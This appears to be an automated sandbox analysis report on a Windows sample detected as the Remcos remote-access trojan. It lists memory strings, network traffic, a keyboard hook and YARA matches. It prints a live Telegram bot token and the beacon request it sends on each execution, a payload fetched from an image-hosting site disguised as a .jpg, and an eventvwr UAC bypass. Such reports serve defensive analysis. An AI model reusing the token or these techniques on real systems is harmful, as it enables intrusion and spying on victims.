              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.416722102.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.605146002.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=13914
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.416884855.0000000002F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org45k$1
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
              Source: FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmp, IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.612073197.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.606501365.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.611674099.000000000440F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.416722102.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, FILE.exe, 00000011.00000002.605146002.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.uplooder.net
              Source: IMG-ZIRAATI03102022.exe, FILE.exe.0.dr, FILE.EXE.12.drString found in binary or memory: https://www.uplooder.net/img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.
              Source: unknownDNS traffic detected: queries for: www.uplooder.net
              Source: global trafficHTTP traffic detected: GET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1Host: www.uplooder.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot5700424484:AAHP7I1VQ--kj9KZNXGLeSEyqUKvt4ILTyk/sendMessage?chat_id=1391434830&text=%0D%0A%F0%9F%94%8A%20*NEW%20EXECUTION*%0D%0A1%EF%B8%8F%E2%83%A3%20User%20=%20user%0D%0A2%EF%B8%8F%E2%83%A3%20Date%20UTC%20=%2010/3/2022%2011:03:09%20PM%0D%0A3%EF%B8%8F%E2%83%A3%20File%20=%20IMG-ZIRAATI03102022.exe HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /img/image/57/b15c1f2fa18efb7b0a2e9e577171ed5d/IMG-ZIRAATI03102022-Wqnntgku.jpg HTTP/1.1Host: www.uplooder.netConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: unknownHTTPS traffic detected: 144.76.120.25:443 -> 192.168.2.3:49698 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 144.76.120.25:443 -> 192.168.2.3:49702 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\AppData\Roaming\FILE.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\FILE.exe
              Source: FILE.exe, 00000011.00000002.603795893.00000000010D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.773154547.0000000001237000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTR

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: IMG-ZIRAATI03102022.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.IMG-ZIRAATI03102022.exe.4173680.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.0.IMG-ZIRAATI03102022.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.4123660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.40fb640.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0.2.IMG-ZIRAATI03102022.exe.42136a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000C.00000000.414784551.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000011.00000002.610648018.0000000003DDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.422576677.00000000040BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.423542604.0000000004213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 5820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: IMG-ZIRAATI03102022.exe PID: 4124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: FILE.exe PID: 4184, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeCode function: 0_2_06062E900_2_06062E90
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeCode function: 0_2_060633500_2_06063350
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeCode function: 0_2_06062BF80_2_06062BF8
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeCode function: 0_2_060691880_2_06069188
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_0136123817_2_01361238
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_0136300117_2_01363001
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_053B917817_2_053B9178
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_053B2E9017_2_053B2E90
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_01365C6017_2_01365C60
              Source: C:\Users\user\AppData\Roaming\FILE.exeCode function: 17_2_01365C5B17_2_01365C5B
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEvxuehfoix.dll" vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406392535.00000000044C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.424695583.0000000005F60000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEvxuehfoix.dll" vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000003.406963478.0000000004647000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.425430724.0000000006120000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 00000000.00000002.417758513.0000000003182000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exe, 0000000C.00000002.418663156.000000000105E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs IMG-ZIRAATI03102022.exe
              Source: IMG-ZIRAATI03102022.exeReversingLabs: Detection: 26%
              Source: IMG-ZIRAATI03102022.exeVirustotal: Detection: 26%
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeFile read: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeJump to behavior
              Source: IMG-ZIRAATI03102022.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\IMG-ZIRAATI03102022.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
